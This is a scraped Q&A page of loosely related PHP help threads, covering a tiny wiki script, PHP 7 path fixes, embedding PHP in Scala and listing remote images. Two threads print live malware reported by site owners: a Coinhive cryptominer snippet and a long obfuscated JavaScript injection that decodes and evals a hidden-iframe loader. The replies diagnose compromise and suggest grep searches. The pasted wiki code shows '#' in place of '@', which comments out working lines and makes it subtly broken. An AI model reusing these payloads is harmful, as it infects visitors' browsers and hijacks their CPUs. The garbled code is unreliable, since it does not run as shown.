Minimalist Wiki like script - php
I'm trying to find a simple wiki like script to setup a personal directory, browser favorites simply doesn't do anymore and i have lots of small files on my flash drive
Desired features
file upload
not bloated
works on a common webhost (aka php)
Thanks in advance
Google Sites functions as a Wiki, and you don't have to make your site public. You can upload files, but there's a 100MB limit for a site. The big advantage here (IMO) is the fact that you don't have to worry about setting up hosting at all.
It has a WYSIWYG editor, so that's a minus if you're really into some particular Wiki syntax, I guess.
Another (non-hosted) option would be TiddlyWiki, which is completely implemented in Javascript and meant to be used on a USB drive, primarily.
I recommend Dokuwiki. Uses text files instead of a database.
A couple of people have recommended Tiddlywiki. I've used it for a simple wiki setup... It's nice, fast, and easy.
You mentioned the need for web-access... Tiddlywiki combined with TiddlyHome is what I use for a simple, single-html-page wiki, which can be used both offline and online...
Another possibility is to use one of the new saving options listed at https://tiddlywiki.com/#Saving, including a Node.js or PHP server, or Google Drive/Dropbox/WebDAV (Sharepoint) integration.
I think this could help you find one that suits your needs: http://www.wikimatrix.org/
I found also this nice script: Hatta
Checkout LionWiki - http://lionwiki.0o.cz
It works from just one file and it's dead simple.
Here's one:
<?php function p($c){$r=preg_replace(array("~^ +([^\n]+)~m",'~^-\s+(.*)$~m',
"~-{4,}\r?\n~",'~(http(?:s)?)://([^\s]+)~i','~\n~'),array('<code>$1</code>','<li>$1',
'<hr>','<a href=$1://$2>$2</a>','<br>'),$c);preg_match_all('~([A-Z]\w+){2,}~',$r,
$x);foreach(array_unique($x[0])as$m){$r=str_replace($m,x($m)? "<a href=?$m>$m</a>":
"$m<a href=?e=$m>?</a>",$r);}return$r;}function f($f){#mkdir('wik');return
#file_get_contents("wik/$f.w");}function b($b){echo"<h1><a href=?$b>Backlinks $b"
."</a></h1><div id=c>";foreach(glob('wik/*.w')as$f){$f=substr($f,4,-2);if(strpos(
f($f),$b)!==false)echo"<a href=?$f>$f</a><br>";}echo"</div>";}function x($f){
return file_exists("wik/$f.w");}function e($p){$p=$p?$p:$_GET['e'];echo"<h1>Edit"
." $p</h1><form action='?$p' method=post><textarea name=c cols=50 rows=10>".f($p)
."</textarea><br><input type=submit value=Save>";}$p=preg_replace('~(e|b)=(.*)~'
,'',$_SERVER[QUERY_STRING]);$c=$_POST[c];$e=$_GET[e];$b=$_GET[b];if(!$p&&!$e)$p=
'MainPage';if($c){#file_put_contents("wik/$p.w",htmlspecialchars($c));header(
"Location: ?$p");}echo"<title>Wik Wiki</title>";if(!$e){if(!$b){echo x($p)?
"<h1><a href=?b=$p>$p</a></h1><div id=c>".p(f($p))."</div><hr><a href=?e=$p>"
."Edit</a> | <small>Modified: ".date('d.m.Y # H:i:s', #filemtime("wik/$p.w"))
:e($p);}else b($b);}else e($e);
It's from http://c2.com/cgi/wiki?WikWiki. It doesn't have file upload but you should be able to add it without bloating. I've used it as a private notepad and it works well, you just have to make sure the web server has write permissions on the wik directory
Related
Substitute for $DOCUMENT_ROOT without register_globals?
I have a website (hand-coded HTML/CSS/PHP) with many hundreds of pages, each with multiple references to $DOCUMENT_ROOT - for example:
<?php include("$DOCUMENT_ROOT/home/index.html"); ?>
Under PHP 5 that worked fine, but register_globals has been deprecated and removed from PHP 7, so it doesn't work anymore.
I don't want to hard-code the path to the file because my testing server and live server use different paths to the files - for example:
Testing server: /home4/testing/public_html/home/index.html
Live server: /home4/live/public_html/home/index.html
(Plus, just on general principles, it seems like a bad idea to hard-code paths needlessly.)
I gather that, syntactically, $_SERVER['DOCUMENT_ROOT'] or $_SERVER["DOCUMENT_ROOT"] can replace $DOCUMENT_ROOT.
I tried a simple search-and-replace on my source HTML:
<?php include("$_SERVER["DOCUMENT_ROOT"]/home/index.html"); ?>
and
<?php include("$_SERVER['DOCUMENT_ROOT']/home/index.html"); ?>
Both don't work - I get ERROR 500.
The first one pretty obviously has a problem with string quoting (too many " in the wrong places).
But the second one doesn't work either (also ERROR 500).
How can I get my site working on PHP 7?
Is there something I can put in .htaccess or php.ini to define $DOCUMENT_ROOT?
Or is there a different syntax that'll work for $_SERVER["DOCUMENT_ROOT"]?
Or is there a better solution?
My main goal is to get it working again ASAP (it's a company website, and it's down because Hostgator has pulled PHP 5 support for security reasons), without creating worse problems.
I found a solution. It's ugly, but it seems to work. I did a brute-force replacement of: "$DOCUMENT_ROOT with: $_SERVER['DOCUMENT_ROOT']." ...across the entire website. It's ugly, but it's working. Suggestions for improvement are welcome.
coinhive script appending Automatically in my website head tag
My website is infected by below script
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('79v4xchNCTv4p6KbAFjk95csadPQAzSy');
miner.start();
</script>
It automatically increases my CPU uses upto 100% on website opening and making
website drastically slow.
I have searched in the full source code of website but not found ant trace of it.
i have also searched into database but could not found.
please suggest how to remove it from website completely.
my website is php based and created with opencart.
It can be difficult to remove all traces of a hack from a website. The main thing to look for here will be functions that encrypt code and then run it like: eval(base64_encode( Do a search in your source code and database for base64 and you may find it.
Check for unespace, document.write(), eval, and atob() in files.
I assume your website is on Linux so you can grep for a string and have it look through the files.
grep --include=\*.{php} -rnw '/var/www/html' -e "coinhive"
^php files only ^location to folder ^ string to search
Look at your Router. If you notice http websites wrapped with frameset, - MirkoTik was hijacked. 1) https://xakep.ru/2018/08/03/mikrotik-under-attack/ 2) https://www.zdnet.com/article/mikrotik-routers-enslaved-in-massive-coinhive-cryptojacking-campaign/ 3) https://thehackernews.com/2018/09/mikrotik-router-hacking.html
Has anyone seen: #0f2490# if(empty($b)) { $b = " "; echo $b; } #/0f2490#
I have many sites, and a couple of them, wordpress or not (some are .php based, some are core HTML. Some are WordPress blogs, and some are just core sites) show this bit of script on page load, and I cannot find it on the server or in the code for the life of me.
#0f2490# if(empty($b)) { $b = " "; echo $b; } #/0f2490#
When checking the source of the sites, it appears there is some javascript code looking for a reference to some site.
I know this isn't enough information to properly troubleshoot the issue. I am asking if anyone has heard of this and can point me in the right direction for resources to research and learn about this issue.
You can see the output for yourself at http://chiuaua.ca
For reference, this is the JavaScript code that appears on the site when using source viewer in either FireFox or Chrome...
#0f2490#
if(empty($b)) { $b = " <script type=\"text/javascript\" language=\"javascript\" > if(document.querySelector)zq=4;a=(\"27,6d,7c,75,6a,7b,70,76,75,27,6a,6a,6b,78,6a,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6a,6a,6b,78,6a,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6a,6a,6b,78,6a,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,7f,75,34,34,69,79,6e,6c,79,74,6c,70,7a,7b,6c,79,70,75,34,6d,79,34,70,6b,7a,7b,6c,70,75,34,6d,7e,6a,77,35,6b,6c,36,7e,6d,78,4b,5f,60,49,5b,35,77,6f,77,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,77,76,7a,70,7b,70,76,75,27,44,27,2e,68,69,7a,76,73,7c,7b,6c,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,6a,76,73,76,79,27,44,27,2e,3c,3a,37,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,6f,6c,70,6e,6f,7b,27,44,27,2e,3c,3a,37,77,7f,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,7e,70,6b,7b,6f,27,44,27,2e,3c,3a,37,77,7f,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,73,6c,6d,7b,27,44,27,2e,38,37,37,37,3c,3a,37,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,7b,76,77,27,44,27,2e,38,37,37,37,3c,3a,37,2e,42,14,11,14,11,27,70,6d,27,2f,28,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,6a,6a,6b,78,6a,2e,30,30,27,82,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,7e,79,70,7b,6c,2f,2e,43,77,27,70,6b,44,63,2e,6a,6a,6b,78,6a,63,2e,27,6a,73,68,7a,7a,44,63,2e,6a,6a,6b,78,6a,37,40,63,2e,27,45,43,36,77,45,2e,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,6a,6a,6b,78,6a,2e,30,35,68,77,77,6c,75,6b,4a,6f,70,73,6b,2f,6a,6a,6b,78,6a,30,42,14,11,27,84,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,5a,6c,7b,4a,76,76,72,70,6c,2f,6a,76,76,72,70,6c,55,68,74,6c,33,6a,76,76,72,70,6c,5d,68,73,7c,6c,33,75,4b,68,80,7a,33,77,68,7b,6f,30,27,82,14,11,27,7d,68,79,27,7b,76,6b,68,80,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,7d,68,79,27,6c,7f,77,70,79,6c,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,70,6d,27,2f,75,4b,68,80,7a,44,44,75,7c,73,73,27,83,83,27,75,4b,68,80,7a,44,44,37,30,27,75,4b,68,80,7a,44,38,42,14,11,27,6c,7f,77,70,79,6c,35,7a,6c,7b,5b,70,74,6c,2f,7b,76,6b,68,80,35,6e,6c,7b,5b,70,74,6c,2f,30,27,32,27,3a,3d,37,37,37,37,37,31,39,3b,31,75,4b,68,80,7a,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,27,44,27,6a,76,76,72,70,6c,55,68,74,6c,32,29,44,29,32,6c,7a,6a,68,77,6c,2f,6a,76,76,72,70,6c,5d,68,73,7c,6c,30,14,11,27,32,27,29,42,6c,7f,77,70,79,6c,7a,44,29,27,32,27,6c,7f,77,70,79,6c,35,7b,76,4e,54,5b,5a,7b,79,70,75,6e,2f,30,27,32,27,2f,2f,77,68,7b,6f,30,27,46,27,29,42,27,77,68,7b,6f,44,29,27,32,27,77,68,7b,6f,27,41,27,29,29,30,42,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,4e,6c,7b,4a,76,76,72,70,6c,2f,27,75,68,74,6c,27,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,79,7b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,75,68,74,6c,27,32,27,29,44,29,27,30,42,14,11,27,7d,68,79,27,73,6c,75,27,44,27,7a,7b,68,79,7b,27,32,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,32,27,38,42,14,11,27,70,6d,27,2f,27,2f,27,28,7a,7b,68,79,7b,27,30,27,2d,2d,14,11,27,2f,27,75,68,74,6c,27,28,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,37,33,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,30,27,30,27,30,14,11,27,82,14,11,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,84,14,11,27,70,6d,27,2f,27,7a,7b,68,79,7b,27,44,44,27,34,38,27,30,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,7d,68,79,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,29,42,29,33,27,73,6c,75,27,30,42,14,11,27,70,6d,27,2f,27,6c,75,6b,27,44,44,27,34,38,27,30,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,73,6c,75,6e,7b,6f,42,14,11,27,79,6c,7b,7c,79,75,27,7c,75,6c,7a,6a,68,77,6c,2f,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,73,6c,75,33,27,6c,75,6b,27,30,27,30,42,14,11,84,14,11,70,6d,27,2f,75,68,7d,70,6e,68,7b,76,79,35,6a,76,76,72,70,6c,4c,75,68,69,73,6c,6b,30,14,11,82,14,11,70,6d,2f,4e,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6a,6a,6b,78,6a,37,40,2f,30,42,14,11,84,14,11,84\".split(\",\"));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(12-5)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String[\"fr\"+\"omCh\"+\"arCo\"+\"de\"].apply(String,a));</script> "; echo $b; }
#/0f2490#
Bad news, looks like your sites have been exploited... I visited the link and it tried to shove several binary files at Safari immediately... Yikes. Another SO thread on a similar problem Your exact code
Your server has been compromised. Bad bad news. What you need to do on the short term is to quickly update all the sites to the last version of wordpress if you are still running an older version. Looking at what you described, the javascript is not in the html source, but is sent down to the browser. This could mean that your wordpress templates are compromised. Look in the upload folders or the template folder to see if there is any extra js files being loaded. Another thing to check is if there is any changes done to the wordpress template's file, or any plugin's file. As wordpress provide a handy web based editor to edit those files, there might be a flaw that allowed malicious codes to inject other scripts into your files via those means.
Scala Lift - Run PHP file from within scala runtime
I'm not entirely sure the wording for the title is correct, but what I'm attempting to do is run and execute PHP files from within the Lift framework. I'm not after any url queries to a PHP file residing on a server, more interested in somehow getting the PHP runtime working through my Scala/Lift app. Use case: I have my app packaged into a .war file, I host this via a cloud provider. I upload code snippets to said app which then runs the php file and does whatever necessary. I've seen various posts regarding Bianca but am hoping to keep this setup light and require only the PHP binary itself and a little code to get it flying. Thanks in advance, please let me know if you need me to elaborate :)
“Never say never, because limits, like fears, are often just an
illusion.”
― Michael Jordan
What you really need is an open source (GPL), embeddable, full PHP 5 implementation, written entirely in Java!
Caucho's Quercus PHP Java runtime is just that, and it will let you run PHP within a Java app without external libraries or native code.
Below is a Quercus-PHP-in-Java code sample I found in this answer
import javax.script.ScriptEngine;
import com.caucho.quercus.script.QuercusScriptEngineFactory;
QuercusScriptEngineFactory factory = new QuercusScriptEngineFactory();
ScriptEngine engine = factory.getScriptEngine();
String phpCode = "<?php $foo = strlen('abc'); print $foo; return 'yikes'; ?>"; //PHP Code as String
Object o = engine.eval(phpCode);
System.out.println(o);
It should be little effort to convert this code to idiomatic Scala. Obviously, the 'phpCode' variable could be constructed from external PHP file contents etc.
Let us know how you get on ;-)
That's a bit of an odd requirement, but if it's what you need to do, you can use a ProcessBuilder to execute and interact with your PHP script from the command line.
Options for reading a remote directory
I have a script that displays images based on certain conditions. When none of the conditions are met, I want to randomly display one of the standard (backup) images. Those other images are on a remote server. I have read that you can't read a directory on a remote server, which makes sense. Is my best bet to place a file into the remote server's image directory that outputs all of the image file names so I can parse it with the other server? Is there an easier way? I prefer not to use FTP (http://php.net/manual/en/book.ftp.php). What are my options for basically just getting the names of the images in that folder? Thanks, Ryan UPDATE: #mario's answer is lightweight and works like a charm. It is exactly the solution I thought I wanted, but after thinking about it some more, and reading that even #mario would do it differently, I decided to go with #bensiu's answer, because to me, control and security are more important than convenience. With #mario's method, it's very hard to know if the data you're getting is any good (lack of control) and you're exposing your directory / some server information (security). #bensiu's suggestion involves a second file (inconvenience), but provides the control and security I'm ultimately deciding to go with! Thank you both! -Ryan
I would prefer an exact and dedicated handler script like #bensiu pointed out.
But an alternative would be to read out a directory listing. A simple Apache generated mod_index listing would be sufficient for:
$html = file_get_contents("http://example.com/images/");
preg_match_all('/<a href="([-\w\d.]+\.(jpeg|png|gif))"/', $html, $uu);
$files = $uu[1];
I hope you at least have access to remote server... You can place there script "A" that will do the job locally, return list of images in preffered format ( raw text, JSON, XML... ), and this script will be remotly called by curl form your server.... It also wise to make sure that when you call script "A" you at least passing some secret key to prevent unathorised access (not perfect solution but could be enought)
if you have PHP5 and the HTTP stream wrapper enabled on your server, it's very easy and simple to copy it to a local file:
copy('http://somedomain.com/file.jpeg', '/tmp/file.jpeg');
ome hosts disable copy() function then you can make your own -
<?php
function copyemz($file1,$file2){
$contentx =#file_get_contents($file1);
$openedfile = fopen($file2, "w");
fwrite($openedfile, $contentx);
fclose($openedfile);
if ($contentx === FALSE) {
$status=false;
}else $status=true;
return $status;
}
?>